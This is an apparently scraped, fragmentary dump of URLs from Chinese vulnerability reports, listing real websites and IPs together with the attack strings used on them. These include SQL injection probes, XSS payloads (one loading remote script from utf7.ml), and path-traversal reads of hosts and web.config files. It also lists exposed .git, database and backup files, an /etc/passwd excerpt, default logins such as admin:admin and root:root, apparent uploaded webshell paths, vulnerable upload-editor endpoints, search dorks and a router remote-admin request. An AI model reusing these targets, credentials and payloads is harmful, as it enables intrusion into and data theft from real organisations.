http://www.zhengjia-speed.com/Netsys/NetsysData/NetsysData.mdb http://www.yudu56.com.cn//Netsys/NetsysData/NetsysData.mdb http://www.aswlgs.com//Netsys/NetsysData/NetsysData.mdb http://www.szbilian.com//Netsys/NetsysData/NetsysData.mdb http://www.baishang56.com//Netsys/NetsysData/NetsysData.mdb http://www.dhl58.com//Netsys/NetsysData/NetsysData.mdb http://www.guanlin.net.cn//Netsys/NetsysData/NetsysData.mdb http://zlgc.gzhu.edu.cn:8080/proapply/login.do http://www.fesco.com.cn/newcms/turnpage/turnpagesearch1.jsp?sortid=0&column_id=0&pageno=0&pagesize=40&searchColumn=&searchValue=&template_id=0&wherestr=1 http://shop.lenovo.com.cn http://www.517lppz.cn/map.aspx?id=1 http://mtp.cnpc.com.cn/ http://cn.trustmobi.com/for_business/for_business_MDM.html test:test http://stv.letv.com/w/m/supportmatch.action?mid=*&uid=null http://www.365art.com/www.rar http://www.dyp2p.com/ http://www.bda.gov.cn/cms/www/index.html http://www.bdaot.com/abroad/enterpriseLoginAction.do?saction=login http://mtp.cnpc.com.cn http://www.sfn.cn/ https://payment.ttyfund.com/utty/show/accountmanage/resetpwd/resetPwd1.action http://shop.lenovo.com.cn http://t.cn/RZLX0zG http://t.cn/RZLX0zG http://app.t.dianping.com/.git/config http://wap.dianping.com/.git/config http://stat.api.dianping.com/.git/config http://stat.api.dianping.com/.git http://stat.api.dianping.com/.git http://220.249.191.172/ http://220.249.191.172/console http://teccard.suda.edu.cn/indexmanagerLogin.action http://t.cn/******* http://i.meituan.com/account/address?cevent=imt%2Faccount%2Fmyinfo%2Faddress http://t.cn/******* http://developer.dianping.com/.git/config http://www.cmatec.net/rencai/upload/,直接看到上传的内容 http://**.**.**/cyrc/mailDossier_urlQueryList_maildossier_urlMailDossierList.action http://dzb.cqrz.edu.cn www.shangceng.com.cn inurl:/?storyshow1/id www.shangceng.com.cn http://www.tjshangceng.com/admin/ http://www.sczshz.com/admin/?main.html inurl:/?storyshow1/id/ http://www.sczshz.com/admin/sys/mantpls/do/?Mantpls-save.html 
http://book.suzhouculture.cn:8080/SzDuxiu/GoDuxiu.action http://180.168.192.34,又见JBOSS,顺便说一句 http://pksy.xjtu.edu.cn/newsDetail.php?newsID=300 http://t.cn/******* http://t.cn/******* http://ucc.damai.cn/ http://ucc.damai.cn/data中看到backup_d5cac3目录,点击进去就是数据库备份的sql http://***.com/fileUpload.do文件是不存在的,要找到他对应的类,然后反编译才可以看到源码。 http://member.95081.com/passport/logon!logout.action http://www.nongyou.com.cn/ http://218.58.124.131:8003/ckq/hnzcout.aspx?tname=中央商务片区&CountryName=小庄社区 http://123.134.189.60:8022/ckq/hnzcout.aspx?tname=牛泉镇&CountryName=杨小庄 http://218.56.99.84:8003/ckq/hnzcout.aspx?tname=双杨镇&CountryName=西张村 http://60.217.72.17:7048/ckq/hnzcout.aspx?tname=辛寨镇&CountryName=田家 http://222.134.154.214:8001/ckq/hnzcout.aspx?tname=西里镇&CountryName=姚宅 http://jwh.tanljgzx.gov.cn/ckq/hnzcout.aspx?tname=宁阳经济开发区&CountryName=邢庄村 http://jwh.tanljgzx.gov.cn/ckq/hnzcout.aspx?tname=宁阳经济开发区&CountryName=邢庄村 http://222.134.154.214:8001/ckq/hnzcout.aspx?tname=西里镇&CountryName=姚宅 http://60.211.179.22:9080/wscgs/xwl.do http://123.130.246.26:9080/wscgs/xwl.do http://www.bzwscgs.com:9080/wscgs/xwl.do http://www.lcwscgs.com/wscgs/xwl.do http://221.2.145.164:9080/wscgs/xwl.do http://58.59.39.43:9080/wscgs/xwl.do http://www.lycgs.gov.cn:9080/wscgs/xwl.do http://www.dygajj.gov.cn:9080/wscgs/xwl.do http://218.59.228.162/wscgs/xwl.do http://60.211.179.22:9080/wscgs/xwl.do http://123.130.246.26:9080/wscgs/xwl.do http://www.56888.net/search/lineslist/ http://www.56888.net/search/lineslist/?ddlStartProvince=36&ddlEndProvince=35&ddlStartCity=40016&ddlEndCity=40002&trantype=%u9646%u8FD0 https://din.qbe.com/dinweb2/logon2/logon.action http://jingyan.baidu.com/search?ssid=&from=&bd_page_type=2&uid=&pu=&st=5&os=&word=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&click=top#0 http://www.apkbus.com/portal.php?mod=portalcp&ac=article&catid=7&op=edit&aid=46781 http://erp.suning.com.cn/epp/登陆处的用户名处未过滤。 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin http://www.whaty.com Demo:http://210.14.133.43/ inurl:jsp http://www.e-health.org.cn/news/xinxi.jsp?ids=82 http://yuancheng.stys.com.cn/tycj/tycj/news.jsp?id=29 http://sv11.wljy.sdu.edu.cn/sduwy/sduwy/news_detail.jsp?id=9216 http://edu.cdpsn.org.cn/zcl/zcl/news/info.jsp?id=671 http://hdsy.demo.webtrn.cn/upol/upol/college/tzgg/tzgg_02.jsp?id=8664 inurl:WhatyEditor http://www.hust-snde.com/hust/WhatyEditor/insertFile.jsp http://www.hust-snde.com/hust/incoming/_/test.jspx http://mdmec.ccom.edu.cn/music//WhatyEditor/insertFile.jsp http://mdmec.ccom.edu.cn/music/incoming/_/1.jspx http://etraining.e-health.org.cn/jsw/WhatyEditor/insertFile.jsp http://etraining.e-health.org.cn/jsw/jsw/firstpage/kqpx/yanshi//114115152740_test.jspx http://dispub.bjtu.edu.cn/ohomework/WhatyEditor/insertFile.jsp http://dispub.bjtu.edu.cn/ohomework/incoming../1418966933561.jsp http://www.swust.net.cn/xnkj/WhatyEditor/insertFile.jsp http://www.swust.net.cn/xnkj/incoming..//114115125419_jsp.jsp http://202.116.42.209/hnyjs/WhatyEditor/insertFile.jsp http://202.116.42.209/hnyjs/incoming/_/1141119121350.jspx http://yuancheng.stys.com.cn/tycj/tycj/zsbm.jsp?id=1 http://www.yanjiao.com/bbs/portal.php?mod=portalcp&ac=article&from_idtype=tid&from_id=464909 inurl:/product.php?type_id= http://www.bj-junyitai.com/product.php?type_id=60 http://www.sqlmap.org www.bj-jun http://172.16.10.223:8080/bwie/login.do http://172.16.10.223:8080/bwie/bwietwo/jsp/xyzsgl/xyzsglController.do?m=rzindex http://172.16.10.223:8080/bwie/left.jsp http://www.sftm.com.cn/event_detail.asp?ClassID=0204&id=839 http://service.faw-mazda.com/Spareparts/index.php/shangkujingpin_ryjc/detail?id=329 
http://document.thinkphp.cn/manual_3_2.html#model_instance http://www.faw.com.cn/down.jsp?Tempfile=/index.jsp http://gztd.faw.com.cn/down.jsp?Tempfile=././faw_online/admin.jsp http://qnzx.faw.com.cn/down.jsp?Tempfile=down.jsp http://gztd.faw.com.cn/jsjd.jsp?Main=jsjd&Type=1%22%20onmouseover%3dprompt%28222222%29%20bad%3d%22 http://218.78.217.95:7001/defaultroot/InfoViewIframeAction.do?historyId=1&action=delHistory http://njjl.gzagri.gov.cn/query/query_toQuery.action www.3721inn.com www.baotoo.com www.czslyydd.com www.maikr.com www.maitix.com www.piao.com.cn http://117.34.65.22:8080/ncmsca_new/main.html# http://oneniceapp.com/ http://110.17.162.183:8081/app!home.do http://nc.xhlbdc.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc.pinggugroup.com:81/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://123.232.105.202/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc55.hspark.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://erp.minyoun.com/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://zfkg.com:8081/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://61.175.97.50/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://zfkg.com:8081/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://erp.minyoun.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc.xhlbdc.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc.pinggugroup.com:81/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://61.175.97.50/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://180.153.27.7:81/ http://erp.suning.com.cn/epp/ http://erp.suning.com.cn/epp/core/manageui.jsp?ctrl=nc.web.epp.k0160.EntryPublishController&delegator=nc.web.epp.k0160.EntryPublishDelegator&roleid=0A&pageId=H0K30160 http://www.wooyun.org/bugs/wooyun-2014-089487/trace/ca338e20666fbe79e87f32643c939075 
http://zone.wooyun.org/content/16772 http://www.hr135.com/ask/index.php?order=add_time http://zhidao.baidu.com/doctor/list/answer?pn=0&rn=10&uid=1343437935&_=1420000464481 http://baike.baidu.com/api/mall/getgoodslist?t=1420003371672&goods_class_id=&goods_price_begin=5001&goods_price_end=10000&goods_order_by=goods_price&goods_had_exchange=&goods_order_type=2&goods_type=1&page=1&word=&showInStock=true http://www.openbase.com.cn/download/login.asp http://zone.wooyun.org/content/16772 http://www.smartcome.com/,此地址选用了百度云加速,我在浏览器中输入 www.smartcome.com/index.php?id=1 www.smartcome.com/index.php?id=1 http://zone.wooyun.org/content/16772 inurl:article_show.asp?id= http://www.chaoguangyue.com/article_show.asp?id=138 http://www.sqlmap.org www.chaogu http://support.gzbg100.cn/sysadmin/Login.aspx http://www.gzbg100.cn/thirdpage/scenicdetails.aspx?id=90002%27 http://www.gzbg100.cn/preferentialPage/ly_iyouhui.aspx?cityid=0451%E2%80%99 http://www.gzbg100.cn/preferentialPage/ly_iyouhui_dy.aspx?pkcode=0451-0313-0001%27 http://xqht.minshengec.com/msadmin/login.jhtml www.histarter.com http://erp.suning.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://gh.cosco-logistics.com.cn/ghoa//mvnforum/index https://tender.wanda.cn/COST/WebService_N/CMWCost/CMWContractVOWebService.asmx,调用的2个byname的service都有注入,想着如果只修补了一个,还能捡个漏,结果修复了一个注入,另一个byname的service直接去掉了。机智! 
https://vendor.wanda.cn/tender/home.aspx https://vendor.wanda.cn/tender/ https://vendor.wanda.cn/tender/trace.axd https://vendor.wanda.cn/tender/Trace.axd?id=18 coding:utf-8 http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=%E5%BA%9F%E6%9F%B4%E5%85%84%E5%BC%9F%E7%AC%AC%E4%BA%8C%E5%AD%A3&nowType=%22%3C/a%3E%3Cimg%20src=http://www.baidu.com/img/bdlogo.png%3E&site=iqiyi http://www.nongyou.com.cn/ http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村 http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村 http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河 http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村 http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 http://www.gtongsudi.com/newsdetail.asp?ids=199 http://gaztbw.gov.cn/fckeditor/editor/fckeditor.html http://www.nongyou.com.cn/ http://222.135.76.147:8200/ckq/jwhkzjdlist.aspx?tname=宁津办事处&CountryName=所前王家 http://60.217.72.17:7117/ckq/jwhkzjdlist.aspx?tname=山头办&CountryName=河北西社区 http://218.58.124.131:8003/ckq/jwhkzjdlist.aspx?tname=综合保税物流片区&CountryName=北岭村 http://218.56.40.229:8013/ckq/jwhkzjdlist.aspx?tname=昆嵛镇&CountryName=滩上 http://218.56.99.84:8003/ckq/jwhkzjdlist.aspx?tname=昆仑镇&CountryName=河石坞村 http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村 http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村 http://222.240.200.21:82/ http://222.240.200.21/ http://222.240.200.21:82/FindPassWord.aspx http://222.240.200.21:82/Admin/Home.aspx http://222.240.200.21/ http://www.nongyou.com.cn/ http://221.2.149.47:8100/jubao/left.aspx http://222.135.109.70:8100/jubao/left.aspx http://123.134.189.60:8012/jubao/left.aspx 
http://218.56.40.229:8020/jubao/left.aspx http://222.135.127.190:7000/jubao/left.aspx http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid= http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid= http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= php:193 inurl:browsebgxz.do?method= http://www.gygxzw.gov.cn:8066/browsebgxz.do?method=dept&deptid=556631684 http://61.189.156.73/browsebgxz.do?method=dept&deptid=009420415 http://58.42.229.238/browsebgxz.do?method=dept&deptid=009430488 http://www.sinanxzfw.gov.cn/browsebgxz.do?method=dept&deptid=009566537 http://58.42.241.14:6778/browsebgxz.do?method=dept&deptid=00941049y http://www.tlsp.net/browsebgxz.do?method=dept&deptid=122711214 http://hxasc.cn/browsebgxz.do?method=dept&deptid=009420247 http://www.jzsxzxndzjcw.gov.cn/browsebgxz.do?method=dept&deptid=999999999999999 http://www.hunan.gov.cn/hxbxxds/ssbb/201412/t20141230_1196349.html http://www.jiacetest.com/about.html http://www.fsmeixi.com/uploadfiles/201303271623290.jsp http://www.jspkongjian.net/ http://fhed.v061.10000net.cn/kefuadmin1/newjspkongjian/fuwuqi.jsp http://www.jiacetest.com/js/wuyun.jsp inurl:morebrowsnews.do http://www.gygxzw.gov.cn:8066/morebrowsnews.do?type=27 http://61.189.156.73/morebrowsnews.do?type=2 http://web161666.5udns.cn/morebrowsnews.do?type=1 http://www.yjxzfw.com.cn/morebrowsnews.do?type=53 http://jjjc.sqxz.gov.cn/morebrowsnews.do?type=15 http://58.42.241.14:6778/morebrowsnews.do?type=100 http://jiubang.kingtrans.cn/ http://szxy.kingtrans.net/ http://yfd.kingtrans.cn/ http://jiubang.kingtrans.cn/ http://newehong.gnway.cc:9898/Logon?action=initMenu http://sfex.kingtrans.cn/ http://szzn.kingtrans.net/ http://th.skyex.com.cn http://md.kingtrans.net/ http://cloud.189.cn/t/bayEZfFzqYva 
http://www.steelchina.cn/newsinfo.php?id=109 http://www.steelchina.cn/newsinfo.php?id=109 http://**.**.**/A430124chss/chss.html http://**.**.**/wwwroot.rar http://hi.hunteron.com/portal.php?mod=portalcp&ac=article&catid=8&op=edit&aid=58 http://dqkh.cmda.org.cn/ http://exam.cmda.org.cn/Login/Login.aspx http://zone.wooyun.org/content/16772 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://tieba.baidu.com/tb/static-common/swf/upload.swf?onFlashInitComplete=alert%28document.body.innerHTML%29 http://tieba.baidu.com/tb/static-encourage/widget/firework/swf/firework_hallowmas_94fe0c1.swf?closeFlash=alert%28document.body.innerHTML%29 http://www.99iwork.com/ http://www.juanct.com/ http://61.233.42.22:28017/ http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function%28%29{alert%28123%29 http://www.cycb.com/review.do?method=col&rid=34439 http://www.sqlmap.org www.cycb.c http://bbs.zmifi.com/uc_server http://**.**.**/ http://m.bistu.edu.cn/newapi/yellowpage.php?action=tel&catid=12 http://mail.yanji.edu.sh.cn/oa/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cOATSUploads http://gmxx.nh.edu.sh.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://202.158.162.185/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5c http://www.whei.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://www.jflxx.fxedu.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://www.ygxx.hpe.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5c http://218.78.245.29/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://www.shjzzx.com/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup 
http://www.ypgz.edu.sh.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5c http://www.cpt.gov.cn/Database/zf11.mdb http://www.cpt.gov.cn/admin/Admin_Login.asp http://www.cpt.gov.cn/editor.asp http://zwgk.wuhai.gov.cn/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts inurl:http://www.ynrsksw.cn/ynrsks/examineerecord/ http://www.zmdslsj.cn//admin/admin_news_pl_view.asp?action=save&id=11 http://www.hhxz.gov.cn/application/zwdt/query.jsp http://www.hhxz.gov.cn/application/zwdt/query.jsp http://219.148.21.1:8081/ http://jxjy.shsmu.edu.cn/ http://app.wanda.cn/newspaper/iView/login.html http://hope.haier.com/ http://hope.haier.com/topic/other/topicBoddys www.shopwind.cn http://www.meiliwangluo.com//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.pugok.com/shop//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.yongminglihui.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.ygxr.me/shop//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.zsrlhf.com/shop//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.shunfengu.com//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://drops.wooyun.org/papers/548 http://hzjt.huazhou.gov.cn/admin/adminlogin.asp http://www.xichu.net/edu/count/col_stat.php?colid=44 http://chongqing.fangdd.com/ http://www.tlgins.com.tw/index.action http://218.78.217.95:7001/defaultroot/voiture_manager/Voituregetsource.jsp?voitureid=696360&type=chgMotorMan inurl:Per_Search_Base.asp http://www.shuobozhaopin.com/Part/Per_Search_Base.asp http://gaobu.dgjob.cn/Part/Per_Search_Base.asp 
http://www.smrc.cn/Part/Per_Search_Base.asp http://www.jobjp.cn/Part/Per_Search_Base.asp http://www.0566job.com/Part/Per_Search_Base.asp http://www.lsrc114.com/Part/Per_Search_Base.asp http://www.fhclm.com/Part/Per_Search_Base.asp http://www.hmcgj.com//admin/admin_news_pl_view.asp?action=save&id=1 http://www.purchase.gov.cn/xygh1.0/egp/cz/wsjy/xyspcg/xzsp/pmcx/ListXysplbIndex,$DirectLink_0.direct?sp=Sff8080813b64837f013b922336973553 http://mail.yueyang.gov.cn/include/config.inc http://www.czkczx.com/FCKeditor/editor/fckeditor.html http://www.czkczx.com/ban.asp http://me.qdwenxue.com/profile/info.aspx http://sq.qidian.com/space/showauthorspace.aspx http://www.fs121.com/notesInfo.aspx?c=0304&id=1147 http://www.fs121.com/yxsm_Index.aspx?m=proxy&a=show&q_url= http://www.fs121.com/yingxiang.aspx?aciton=sx&eTime=&sTime=&sortType=u http://www.fs121.com/qxkpwd.aspx?code=080402 http://www.fs121.com/weather/focn.aspx?T=map&cid= http://www.fs121.com/%22AwshourfRain.aspx?sid= http://www.fs121.com/VISLine.aspx?t=1&n= http://gsics.nsmc.cma.gov.cn/loginAction!login.action http://gsics.nsmc.cma.gov.cn/test.txt http://www.17u.com/destination/city_lvyou_4602.html http://******* http://www.qhdjtj.gov.cn/manage/login.php http://wooyun.org/bugs/wooyun-2014-076565 http://www.z029.com/ inurl:php/LY_message.php?job= http://www.htgrape.com/php/LY_message.php?job=add http://www.xdblq.com/php/LY_message.php?job=add http://www.forstar.com.cn/php/LY_message.php?job=add http://www.zryhsx.com/php/LY_message.php?job=add http://www.xayzw.com/php/LY_message.php?job=add http://www.xasaihu.com/php/LY_message.php?job=add http://www.xaqsw.com/php/LY_message.php?job=add http://www.laosundajia.com/php/LY_message.php?job=add http://www.guangrensi.com/php/LY_message.php?job=add http://www.htgrape.com/php/LY_message.php?job=add http://www.xasaihu.com/php/LY_message.php?job=add http://www.anchensw.com/php/LY_message.php?job=add http://www.silian.com.cn/php/LY_message.php?job=add 
http://www.sundagentleman.com/FT/php/LY_message.php?job=add http://www.chengji-express.com/newshow.asp?id=483 http://csc2013.buaa.edu.cn/content.php?id=9 http://www.gwbn.cq.cn/ http://www.gwbn.cq.cn/special.asp?columnid=31 www.gwbn.cq.cn http://www.tcc-npfpc.org.cn/list.aspx?id=0101 http://dwgk.rcjt.gov.cn/admin/admin_login.asp http://www.zinch.cn/cwl_2013.log?flush=js,css http://sj.cityonmap.com/upgrade/login.action http://120.132.39.35:8082/bj_agent/login/login.action http://www.cicro.com/ inurl:list2.jsp?tag_id= http://www.funan.gov.cn/appeal/list2.jsp?tag_id=8 http://www.shcgb.cn/appeal/list2.jsp?tag_id=9 http://hudong.hanzhong.gov.cn/appeal/list2.jsp?tag_id=9 http://sss.jzpolice.gov.cn/appeal/list2.jsp?tag_id=&sq_title=&model_id=13&pur_id=&start_time=&cur_page=9 http://www.hblr.gov.cn/appeal/list2.jsp?tag_id=&sq_title=&model_id=17&pur_id=&start_time=&cur_page=1 http://202.109.244.242/.svn/entries http://www.wzecloud.com/ZBdeploy.php?_cls=user&_act=selectedArea&areaId=1 inurl:newgoods.asp?action_key_order=news http://www.anxi-chaye.cn/shop//admin/upLoad_bm.asp?a=uploadfile http://www.hongchapifa.com//admin/upLoad_bm.asp?a=uploadfile http://www.gsbiaopai.cn//admin/upLoad_bm.asp?a=uploadfile http://tianyacha.com/shop//admin/upLoad_bm.asp?a=uploadfile http://www.tjxbz.com/shop//admin/upLoad_bm.asp?a=uploadfile http://www.mygoodtea.cn//admin/upLoad_bm.asp?a=uploadfile http://www.dunxing.net/shop//admin/upLoad_bm.asp?a=uploadfile http://www.axxzch.com/shop//admin/upLoad_bm.asp?a=uploadfile http://xingjitea.com/shop//admin/upLoad_bm.asp?a=uploadfile http://axwenxiang.com/shop//admin/upLoad_bm.asp?a=uploadfile http://chaye138.com//admin/upLoad_bm.asp?a=uploadfile http://www.szjc160.cn//admin/upLoad_bm.asp?a=uploadfile http://www.cha95.com//admin/upLoad_bm.asp?a=uploadfile http://herb-remedy.com//admin/upLoad_bm.asp?a=uploadfile http://chaducha.com/tieguanyin//admin/upLoad_bm.asp?a=uploadfile http://www.620026.com/shop//admin/upLoad_bm.asp?a=uploadfile 
inurl:news_more.asp?lm2= http://tms.mshcpt.net http://tms.mshcpt.net:7007/eoms width:980px;height:600px;margin:0 width:300px width:60px width:80%;height:60% http://hywh.bnu.edu.cn/ http://minisite.youku.com/xiaorenwu/show_v.php?vid=XODQ0ODI4MTM2 www.fsrsks.com http://cci.scu.edu.cn/ http://cci.scu.edu.cn//admin/login.asp www.wczx.jinedu.cn为例,通用搜索内容:锐捷网络有限公司 http://www.china-tibetan.com http://www.szqsfj.com/index.htm http://www.wczx.jinedu.cn等多个网站都存在一个COOKIES通用的情况。。。这是万能COOKIES http://jpk.scuec.edu.cn/yaoxue1/about.php?type=82 http://www.17u.com/activity/17u-fengchenghe/Afengchenghe.ashx?type=GetPhone&p=13888888888%27 https://122.226.150.69/admin/fckeditor/editor/filemanager/upload/php/upload.php https://122.226.150.69/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media https://122.226.150.69/vpnweb/userfiles/media/2011.php http://61.237.239.144/ictrcp/base/index.action http://58.68.226.208/cacti user:admin,pass:admin http://58.68.226.208/ http://www.rayli.com.cn/ http://58.68.226.153:8089/login/login.action http://58.68.226.153:8089/login/login.action http://58.68.226.208/phpMyAdmin/ http://58.68.226.208/ http://www.rayli.com.cn/ http://xiangmai.rayli.com.cn/.svn/entries http://xiangmai.rayli.com.cn/index.php?/admin/login http://jinan.anjuke.com/community/subscribe/sendtophone/226122?r=0.38136472278977346 http://www.masxzfwzx.gov.cn/test/ http://campus.xunlei.com/ http://www.huntingpr.com/ mx://res/options/index.htm mx://res/options/index.htm,之后只要打开浏览器,xss代码就能被执行。 http://sns.web.maxthon.cn/browser/index.php?session_id=1 http://utf7.ml/t/maxthon1.js http://utf7.ml/t/maxthon1.js,js的代码如下 http://www.55.la:80/ www.55.la http://ask.533.com/public/upload/53abd86fdca51.jpg http://ask.533.com/public/upload/53abd86fdca51.jpg/a.php http://ask.533.com/home/questlist/index/cid/111 http://ask.533.com/home/questlist/index/cid/acu3754%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3754 http://fc.tcl.com:6888/admin/ 
www.966009.com/client/business/shownetdot.aspx?city=1&dot_id=586 exp:http://192.168.0.1:8081/cgi-bin-igd/netcore_get.cgi?mode_name=netcore_get&no=no http://192.168.0.1:8081/cgi-bin-igd/netcore_set.cgi?mode_name=netcore_set&remote_enable=1&remote_port=8083&save_web_config=save http://localhost/yun/?/admin/template/update/Y2FydC5jYXJ0bGlzdC5odG1s# http://localhost/yun/?/admin/template/update/eC5waHA=# http://fans.51job.com http://fans.51job.com/payservice/fans/ajax/weibo_ajax.php http://fans.51job.com/payservice/fans/ajax/weibo_ajax.php?type=8&optype=2&replyid=¬iceid=150110020596857&transmit=0&reply=0&content=转播评论的内容&interviews_transmit=0&sExtendTransmitType=&bExtendTransmit=0&sina_authorize=0&qq_authorize=0 http://www.baidu.com/dan.php?c=IZ0-5HDYnW0snWRzPWT0IgF_5y9YIZ0lQzqYQhP8QdFpNyqhRAn0&k=s_1028238 http://request.help.sohu.com/help/form http://124.238.218.78 http://124.238.218.78/report/spxxcxlb.jsp http://czswsjd.com/2052/Aspx/DownLoad.ashx?name=wooyuntest.txt&path=../../web.config http://czswsjd.com/2052/Aspx/DownLoad.ashx?path=hhhhhhh http://www.sino-manager.com/ http://www.sino-manager.com/robots.txt http://www.sino-manager.com//Pages/Administrate1/ http://www.xmqcz.com/getmsgb.php?qno=7556989 http://www.xmqcz.com/getmsgb.php?qno=7556989 http://www.xmqcz.com/bbs/index.php inurl:Article_Print.asp?ArticleID= http://www.dct.com.cn/Article_Print.asp?ArticleID=745 http://www.dct.com.cn/Article_Class.asp?ClassID=1 http://www.wzqjks.com/Article_Print.asp?ArticleID=504 http://www.wzqjks.com/Article_Class.ASP?ClassID=8 http://www.lishou.com/dl/Article_Print.asp?ArticleID=3925 http://www.lishou.com/dl/Article_Class.asp?ClassID=1 http://www.jt8421.com/Article_Print.asp?ArticleID=137 http://www.jt8421.com/Article_Class.asp?ClassID=2 http://www.jhsyzx.com/gms/Article_Print.asp?ArticleID=1855 http://www.jhsyzx.com/gms/Article_Class.asp?ClassID=1 http://www.hfjs.gov.cn/Publish/content.jsp?magazine_id=080827121317&item_id=080827121387&body_id=080902122487 
http://www.hfjs.gov.cn/jw_home/monthly_cover.jsp?item_id=0306&id=140307933015 http://www.hfjs.gov.cn/Publish/content.jsp?magazine_id=080827121317&item_id=080827121387&body_id=080902122487 http://test002.cqhot.com/user_login.php?accesscheck=%2Findex.php http://game.sina.com.hk/cgi-bin/api/fl/show/rate.cgi http://171.111.157.200:81/phpmyadmin/ root:root http://m.mafengwo.cn/i/3266276.html http://kdcs.hn.189.cn/speedTest//broadbandSpeedTest4/speedtest_proxy.jsp?ip=*.*.*.* http://www.czhrss.gov.cn/index.php?m=formguide&c=index&a=search?m=formguide&c=index&a=search&t=zlfwxm&searchtype=like&word_value=88888&dosubmit= 鎼?nbsp;绱?nbsp;&keyword=1 http://dny.mop.com/ http://218.244.138.241:9000/ http://vip.kankan.com/sftp-config.json http://wbond.net/sublime_packages/sftp/settings kankan.com/vip.kankan.com/ http://polyhotels.com/index.php?m=News&a=company&op=con&id=61%20and%201=1 http://polyhotels.com/admin.php登陆到网站管理后台。 http://kdb.lenovo.com.cn/.git/config http://kdb.lenovo.com.cn/_core/config.php.bak http://www.ly.com/Hotel/ajax/HotelInfoAjax.aspx?action=getHotelAjaxCotentHtml&hotelId=6192&pageKey=hotelcomments1200&iid=0.8779298369772732 http://222.82.208.98:8088/Report/userlogin.action http://wl.gametider.com.tw/member/register.action http://lifenote.baidu.com/fancybox/jquery.fancybox.css/1.php http://game.weibo.com/dahanghaisj?action=login&service=180012091139&ownpt=weibo&oid=1000106810002 http://1001.static.webgame9.com/static/gameshow/gameshowPublic/jquery-1.7.2.js http://1001.static.webgame9.com/static/gameshow/gameshowPublic/swfobject.js http://1001.static.webgame9.com/static/gameshow/sina/gameshow.js http://www.956122.com/user.do?action=showupdatepassword&username=admin http://tms.byd.com.cn/system/login!login.action http://java.sun.com/ http://106.2.180.186/ http://movie.weibo.com/movie/web/category?from=faxian_movie# 